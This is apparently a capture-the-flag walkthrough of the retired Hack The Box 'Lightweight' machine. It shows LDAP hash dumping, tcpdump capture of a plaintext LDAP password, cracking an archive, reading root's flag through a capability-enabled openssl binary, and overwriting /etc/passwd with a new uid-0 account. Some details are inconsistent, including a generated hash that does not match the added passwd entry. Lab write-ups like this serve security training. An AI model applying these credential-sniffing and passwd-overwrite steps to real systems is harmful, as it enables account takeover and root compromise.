Today we are going to solve another CTF challenge “lightweight”. It is a retired vulnerable lab presented by Hack the Box for helping pentesters to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Medium
Task: To find user.txt and root.txt file
Note: Since these labs are online available, therefore, they have a static IP. The IP of lightweight is 10.10.10.119
Let’s start off with our basic Nmap command to find out the open ports and services.
nmap -sV -sT -sC lightweight.htb Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-06 02:55 EDT Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 13.55% done; ETC: 02:57 (0:01:23 remaining) Nmap scan report for lightweight.htb (10.10.10.119) Host is up (0.54s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 19:97:59:9a:15:fd:d2:ac:bd:84:73:c4:29:e9:2b:73 (RSA) | 256 88:58:a1:cf:38:cd:2e:15:1d:2c:7f:72:06:a3:57:67 (ECDSA) |_ 256 31:6c:c1:eb:3b:28:0f:ad:d5:79:72:8f:f5:b5:49:db (ED25519) 80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16) |_http-title: Lightweight slider evaluation page - slendr 389/tcp open ldap OpenLDAP 2.2.X - 2.3.X | ssl-cert: Subject: commonName=lightweight.htb | Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain | Not valid before: 2018-06-09T13:32:51 |_Not valid after: 2019-06-09T13:32:51 |_ssl-date: TLS randomness does not represent time Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 80.51 seconds
Therefore, with the help of nmap NSE script we go for LDAP enumeration:
root@kali:~/htb/lightweight# nmap -Pn -p 389 --script ldap-search 10.10.10.119 Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-06 02:57 EDT Nmap scan report for lightweight.htb (10.10.10.119) Host is up (0.026s latency). PORT STATE SERVICE 389/tcp open ldap | ldap-search: | Context: dc=lightweight,dc=htb | dn: dc=lightweight,dc=htb | objectClass: top | objectClass: dcObject | objectClass: organization | o: lightweight htb | dc: lightweight | dn: cn=Manager,dc=lightweight,dc=htb | objectClass: organizationalRole | cn: Manager | description: Directory Manager | dn: ou=People,dc=lightweight,dc=htb | objectClass: organizationalUnit | ou: People | dn: ou=Group,dc=lightweight,dc=htb | objectClass: organizationalUnit | ou: Group | dn: uid=ldapuser1,ou=People,dc=lightweight,dc=htb | uid: ldapuser1 | cn: ldapuser1 | sn: ldapuser1 | mail: ldapuser1@lightweight.htb | objectClass: person | objectClass: organizationalPerson | objectClass: inetOrgPerson | objectClass: posixAccount | objectClass: top | objectClass: shadowAccount | userPassword: {crypt}$6$3qx0SD9x$Q9y1lyQaFKpxqkGqKAjLOWd33Nwdhj.l4MzV7vTnfkE/g/Z/7N5ZbdEQWfup2lSdASImHtQFh6zMo41ZA./44/ | shadowLastChange: 17691 | shadowMin: 0 | shadowMax: 99999 | shadowWarning: 7 | loginShell: /bin/bash | uidNumber: 1000 | gidNumber: 1000 | homeDirectory: /home/ldapuser1 | dn: uid=ldapuser2,ou=People,dc=lightweight,dc=htb | uid: ldapuser2 | cn: ldapuser2 | sn: ldapuser2 | mail: ldapuser2@lightweight.htb | objectClass: person | objectClass: organizationalPerson | objectClass: inetOrgPerson | objectClass: posixAccount | objectClass: top | objectClass: shadowAccount | userPassword: {crypt}$6$xJxPjT0M$1m8kM00CJYCAgzT4qz8TQwyGFQvk3boaymuAmMZCOfm3OA7OKunLZZlqytUp2dun509OBE2xwX/QEfjdRQzgn1 | shadowLastChange: 17691 | shadowMin: 0 | shadowMax: 99999 | shadowWarning: 7 | loginShell: /bin/bash | uidNumber: 1001 | gidNumber: 1001 | homeDirectory: /home/ldapuser2 | dn: cn=ldapuser1,ou=Group,dc=lightweight,dc=htb | objectClass: posixGroup | objectClass: top | cn: ldapuser1 | userPassword: {crypt}x | gidNumber: 1000 | dn: cn=ldapuser2,ou=Group,dc=lightweight,dc=htb | objectClass: posixGroup | objectClass: top | cn: ldapuser2 | userPassword: {crypt}x |_ gidNumber: 1001 Nmap done: 1 IP address (1 host up) scanned in 0.92 seconds
Since we know that http service was running on port 80 therefore, we navigate to a web browser and browse target IP and welcome by following page where we saw “This site is protected by against brute forcing ” that mean fail2ban could be running inside VM moreover we found three hyperlinks.
When I opened the user.php hyperlink I read the highlighted text and according to this text, a user in the machine has been automatically added for us.
Exploiting
Therefore, I try to connect with SSH by using 10.10.14.10:10.10.14.10 as login credential. At this point, I was not sure what should be done to extract hidden flag, therefore, I thought to identify the binary capability files with the help of getcap and saw the fruitful result.
root@kali:~/htb# ssh 10.10.14.7@lightweight.htb
10.10.14.7@lightweight.htb's password:10.10.14.7
[10.10.14.7@lightweight ~]$ id
uid=1003(10.10.14.7) gid=1003(10.10.14.7) groups=1003(10.10.14.7) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[10.10.14.7@lightweight ~]$ getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/mtr = cap_net_raw+ep
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep
tcpdump -i any -X port ldap
As result, we observe the following traffic, as predicted, where I found the ldapuser2 password in plaintext.
[10.10.14.7@lightweight ~]$ tcpdump -i any -X port ldap
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes
08:04:48.987956 IP lightweight.htb.59646 > lightweight.htb.ldap: Flags [S], seq 4215069383, win 43690, options [mss 65495,sackOK,TS val 372966 ecr 0,nop,wscale 6], length 0
0x0000: 4500 003c 6a21 4000 4006 a799 0a0a 0a77 E..<j!@.@......w
0x0010: 0a0a 0a77 e8fe 0185 fb3c dac7 0000 0000 ...w.....<......
0x0020: a002 aaaa 2930 0000 0204 ffd7 0402 080a ....)0..........
0x0030: 0005 b0e6 0000 0000 0103 0306 0000 0000 ................
0x0040: 0000 0000 0000 0000 0000 0000 ............
08:04:48.987983 IP lightweight.htb.ldap > lightweight.htb.59646: Flags [S.], seq 3703358360, ack 4215069384, win 43690, options [mss 65495,sackOK,TS val 372966 ecr 372966,nop,wscale 6], length 0
0x0000: 4500 003c 0000 4000 4006 11bb 0a0a 0a77 E..<..@.@......w
0x0010: 0a0a 0a77 0185 e8fe dcbc c398 fb3c dac8 ...w.........<..
0x0020: a012 aaaa 2930 0000 0204 ffd7 0402 080a ....)0..........
0x0030: 0005 b0e6 0005 b0e6 0103 0306 0000 0000 ................
0x0040: 0000 0000 0000 0000 0000 0000 ............
08:04:48.988003 IP lightweight.htb.59646 > lightweight.htb.ldap: Flags [.], ack 1, win 683, options [nop,nop,TS val 372966 ecr 372966], length 0
0x0000: 4500 0034 6a22 4000 4006 a7a0 0a0a 0a77 E..4j"@.@......w
0x0010: 0a0a 0a77 e8fe 0185 fb3c dac8 dcbc c399 ...w.....<......
0x0020: 8010 02ab 2928 0000 0101 080a 0005 b0e6 ....)(..........
0x0030: 0005 b0e6 0000 0000 0000 0000 0000 0000 ................
0x0040: 0000 0000 ....
08:04:48.988062 IP lightweight.htb.59646 > lightweight.htb.ldap: Flags [P.], seq 1:92, ack 1, win 683, options [nop,nop,TS val 372966 ecr 372966], length 91
0x0000: 4500 008f 6a23 4000 4006 a744 0a0a 0a77 E...j#@.@..D...w
0x0010: 0a0a 0a77 e8fe 0185 fb3c dac8 dcbc c399 ...w.....<......
0x0020: 8018 02ab 2983 0000 0101 080a 0005 b0e6 ....)...........
0x0030: 0005 b0e6 3059 0201 0160 5402 0103 042d ....0Y...`T....-
0x0040: 7569 643d 6c64 6170 7573 6572 322c 6f75 uid=ldapuser2,ou
0x0050: 3d50 656f 706c 652c 6463 3d6c 6967 6874 =People,dc=light
0x0060: 7765 6967 6874 2c64 633d 6874 6280 2038 weight,dc=htb..8
0x0070: 6263 3832 3531 3333 3261 6265 3164 3766 bc8251332abe1d7f
0x0080: 3130 3564 3365 3533 6164 3339 6163 3200 105d3e53ad39ac2.
0x0090: 0000 0000 0000 0000 0000 0000 0000 00 ...............
08:04:48.988069 IP lightweight.htb.ldap > lightweight.htb.59646: Flags [.], ack 92, win 683, options [nop,nop,TS val 372966 ecr 372966], length 0
0x0000: 4500 0034 737f 4000 4006 9e43 0a0a 0a77 E..4s.@.@..C...w
0x0010: 0a0a 0a77 0185 e8fe dcbc c399 fb3c db23 ...w.........<.#
0x0020: 8010 02ab 2928 0000 0101 080a 0005 b0e6 ....)(..........
0x0030: 0005 b0e6 0000 0000 0000 0000 0000 0000 ................
0x0040: 0000 0000 ....
08:04:48.997887 IP lightweight.htb.ldap > lightweight.htb.59646: Flags [P.], seq 1:15, ack 92, win 683, options [nop,nop,TS val 372976 ecr 372966], length 14
0x0000: 4500 0042 7380 4000 4006 9e34 0a0a 0a77 E..Bs.@.@..4...w
0x0010: 0a0a 0a77 0185 e8fe dcbc c399 fb3c db23 ...w.........<.#
0x0020: 8018 02ab 2936 0000 0101 080a 0005 b0f0 ....)6..........
0x0030: 0005 b0e6 300c 0201 0161 070a 0100 0400 ....0....a......
0x0040: 0400 0000 0000 0000 0000 0000 0000 0000 ................
0x0050: 0000 ..
08:04:48.997899 IP lightweight.htb.59646 > lightweight.htb.ldap: Flags [.], ack 15, win 683, options [nop,nop,TS val 372976 ecr 372976], length 0
0x0000: 4500 0034 6a24 4000 4006 a79e 0a0a 0a77 E..4j$@.@......w
0x0010: 0a0a 0a77 e8fe 0185 fb3c db23 dcbc c3a7 ...w.....<.#....
0x0020: 8010 02ab 2928 0000 0101 080a 0005 b0f0 ....)(..........
0x0030: 0005 b0f0 0000 0000 0000 0000 0000 0000 ................
0x0040: 0000 0000 ....
08:04:49.001674 IP lightweight.htb.59646 > lightweight.htb.ldap: Flags [P.], seq 92:99, ack 15, win 683, options [nop,nop,TS val 372980 ecr 372976], length 7
0x0000: 4500 003b 6a25 4000 4006 a796 0a0a 0a77 E..;j%@.@......w
0x0010: 0a0a 0a77 e8fe 0185 fb3c db23 dcbc c3a7 ...w.....<.#....
0x0020: 8018 02ab 292f 0000 0101 080a 0005 b0f4 ....)/..........
0x0030: 0005 b0f0 3005 0201 0242 0006 0000 0000 ....0....B......
0x0040: 0000 0000 0000 0000 0000 00 ...........
^C
8 packets captured
44 packets received by filter
28 packets dropped by kernel
Then we switch the user with the following credential and obtain our first flag user.txt
Username: ldapuser2 Password: 8bc8251332abe1d7f105d3e53ad39ac2
10.10.14.7@lightweight ~]$ su ldapuser2 Password: 8bc8251332abe1d7f105d3e53ad39ac2 [ldapuser2@lightweight 10.10.14.7]$ pwd /home/10.10.14.7 [ldapuser2@lightweight 10.10.14.7]$ cd .. [ldapuser2@lightweight home]$ ls 10.10.14.2 10.10.14.7 ldapuser1 ldapuser2 [ldapuser2@lightweight home]$ cd ldapuser2 [ldapuser2@lightweight ~]$ ls backup.7z OpenLDAP-Admin-Guide.pdf OpenLdap.pdf user.txt [ldapuser2@lightweight ~]$ cat user.txt 8a866d3bb7e13a57aaeb110297f48026
Privilege Escalation
Inside the directory /ldapuser2, I found an archive as backup.7z and for its inspection, we need to transfer this file mine in our local machine.
[ldapuser2@lightweight ~]$ cat backup.7z | base64 N3q8ryccAAQmbxM1EA0AAAAAAAAjAAAAAAAAAI5s6D0e1KZKLpqLx2xZ2BYNO8O7/Zlc4Cz0MOpB lJ/010X2vz7SOOnwbpjaNEbdpT3wq/EZAoUuSypOMuCw8Sszr0DTUbIUDWJm2xo9ZuHIL6nVFlVu --snip-- 3sgjI hYusiF1vL3ojt9qcVa4mCjTpus4e3vJ4gd6iWAt8KT2GmnPjb0+N+tYjcX9U/W/leRKQGX/USF7X WwZioJpI7t/uAAAAABcGjFABCYDAAAcLAQABIwMBAQVdABAAAAyBCgoBPiBwEwAA
So, I copied it in our machine and try to extract the file, but it was password protected.
I used below to crack the file
And use the “delete” password to extract the directory. I found some php files here and we looked for a status.php file among those files.
root@kali:~/htb/lightweight# 7z e backup.7z 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21 p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Pentium(R) CPU 4415U @ 2.30GHz (806E9),ASM,AES-NI) Scanning the drive for archives: 1 file, 3411 bytes (4 KiB) Extracting archive: backup.7z -- Path = backup.7z Type = 7z Physical Size = 3411 Headers Size = 259 Method = LZMA2:12k 7zAES Solid = + Blocks = 1 Enter password (will not be echoed): Everything is Ok Files: 5 Size: 10270 Compressed: 3411 root@kali:~/htb/lightweight# ls backup.7z backup.7z.b64 index.php info.php reset.php status.php user.php
The status.php file reveals the password of ldapuser1 as shown below.
root@kali:~/htb/lightweight# cat status.php | grep user $username = 'ldapuser1'; //$ldapconfig['usersdn'] = 'cn=users'; $dn="uid=ldapuser1,ou=People,dc=lightweight,dc=htb"; <p><br><br><a href="index.php">home</a> <a href="info.php">info</a> <a href="status.php">status</a> <a href="user.php">user</a></p> root@kali:~/htb/lightweight# cat status.php | grep password $password = 'f3ca9d298a553da117442deeb6fa932d'; if ($bind=ldap_bind($ds, $dn, $password)) {
Thus, we switched to ldapuser1 and navigate inside the directory of ldapuser1
[ldapuser2@lightweight ~]$ su ldapuser1 Password: f3ca9d298a553da117442deeb6fa932d [ldapuser1@lightweight ldapuser2]$ pwd /home/ldapuser2 [ldapuser1@lightweight /]$ cd /home/ldapuser1 [ldapuser1@lightweight ~]$ ls -la total 1496 drwx------. 4 ldapuser1 ldapuser1 181 Jun 15 2018 . drwxr-xr-x. 6 root root 76 Sep 6 07:57 .. -rw-------. 1 ldapuser1 ldapuser1 0 Jun 21 2018 .bash_history -rw-r--r--. 1 ldapuser1 ldapuser1 18 Apr 11 2018 .bash_logout -rw-r--r--. 1 ldapuser1 ldapuser1 193 Apr 11 2018 .bash_profile -rw-r--r--. 1 ldapuser1 ldapuser1 246 Jun 15 2018 .bashrc drwxrwxr-x. 3 ldapuser1 ldapuser1 18 Jun 11 2018 .cache -rw-rw-r--. 1 ldapuser1 ldapuser1 9714 Jun 15 2018 capture.pcap drwxrwxr-x. 3 ldapuser1 ldapuser1 18 Jun 11 2018 .config -rw-rw-r--. 1 ldapuser1 ldapuser1 646 Jun 15 2018 ldapTLS.php -rwxr-xr-x. 1 ldapuser1 ldapuser1 555296 Jun 13 2018 openssl -rwxr-xr-x. 1 ldapuser1 ldapuser1 942304 Jun 13 2018 tcpdump [ldapuser1@lightweight ~]$ getcap -r / 2>/dev/null /usr/bin/ping = cap_net_admin,cap_net_raw+p /usr/sbin/mtr = cap_net_raw+ep /usr/sbin/suexec = cap_setgid,cap_setuid+ep /usr/sbin/arping = cap_net_raw+p /usr/sbin/clockdiff = cap_net_raw+p /usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep /home/ldapuser1/tcpdump = cap_net_admin,cap_net_raw+ep /home/ldapuser1/openssl =ep [ldapuser1@lightweight ~]$ ./openssl base64 -a -in /root/root.txt | base64 -d f1d4e309c5a6b3fffff74a8f4b2135fa
This time once again I checked for file capacity where I saw OpenSSL has all privileges to read a file that owned root user and therefore we decided to grab root.txt directly through OpenSSL.
We can also get a root shell by overwriting /etc/passwd
. I got a copy of the original passwd
file first : ./openssl enc -base64 -in /etc/passwd -out ./passwd.b64
1st we make a new salted combined username and password in MD5 algorithm. For this the command used is
root@kali:~/htb# openssl passwd -1 -salt toor1 foo
$1$toor1$ul/jFevbTiCURU7.RJaPs.
[ldapuser1@lightweight ~]$ base64 -d passwd.b64 > passwd
[ldapuser1@lightweight ~]$ echo "toor1:aaKNIEDOaueR6:0:0:toor:/root:/bin/bash" >> passwd
[ldapuser1@lightweight ~]$ cat passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
--snip--
tcpdump:x:72:72::/:/sbin/nologin
ldap:x:55:55:OpenLDAP server:/var/lib/ldap:/sbin/nologin
saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin
ldapuser1:x:1000:1000::/home/ldapuser1:/bin/bash
ldapuser2:x:1001:1001::/home/ldapuser2:/bin/bash
10.10.14.2:x:1002:1002::/home/10.10.14.2:/bin/bash
10.10.14.7:x:1003:1003::/home/10.10.14.7:/bin/bash
toor1:aaKNIEDOaueR6:0:0:toor:/root:/bin/bash
[ldapuser1@lightweight ~]$ ./openssl enc -in passwd -out /etc/passwd
[ldapuser1@lightweight ~]$ su toor1
Password: foo
[root@lightweight ldapuser1]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@lightweight ldapuser1]# hostnamectl Static hostname: lightweight.htb Icon name: computer-vm Chassis: vm Machine ID: 5c4e4aeb65784243992e15ac56ed6b3d Boot ID: d6332c6cc8834f9980faf65efa1a6513 Virtualization: vmware Operating System: CentOS Linux 7 (Core) CPE OS Name: cpe:/o:centos:centos:7 Kernel: Linux 3.10.0-862.3.3.el7.x86_64 Architecture: x86-64 [root@lightweight ldapuser1]#
credits to : https://www.hackingarticles.in/lightweight-hack-the-box-walkthrough/
Author: Jacco Straathof